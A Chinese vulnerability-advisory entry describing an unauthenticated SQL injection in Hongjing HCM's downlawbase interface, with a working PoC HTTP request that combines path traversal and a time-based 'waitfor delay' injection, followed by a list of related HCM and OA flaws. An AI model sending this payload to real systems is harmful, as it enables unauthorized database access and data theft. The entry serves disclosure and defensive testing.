宏景HCM-downlawbase接口存在SQL注入漏洞

漏洞描述

宏景人力资源管理系统是一款由宏景软件研发的系统。宏景HCM-downlawbase接口存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

PoC代码

## 宏景HCM-downlawbase接口存在SQL注入漏洞







## poc

```

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=11';waitfor+delay+'0:0:2'--+ HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)

Accept: */*

Accept-Encoding: gzip, deflate

Connection: close

```

漏洞描述

PoC代码

相关漏洞推荐

potential-hjsoft-hcm-khfieldtree-sqli: 宏景HCM KhFieldtree接口SQL注入[需手工验证] POC

宏景HCM /w_selfservice/oauthservlet/../../general/inform/org/loadhistroyorgtree SQL 注入漏洞（CVE-2023-6655） 无POC

宏景HCM /templates/attestation/.. /.. /servlet/fieldsettree SQL 注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

宏景HCM /w_selfservice/oauthservlet/../../general/inform/org/loadhistroyorgtree SQL 注入漏洞（CVE-2023-6655）无POC

宏景HCM /templates/attestation/.. /.. /servlet/fieldsettree SQL 注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC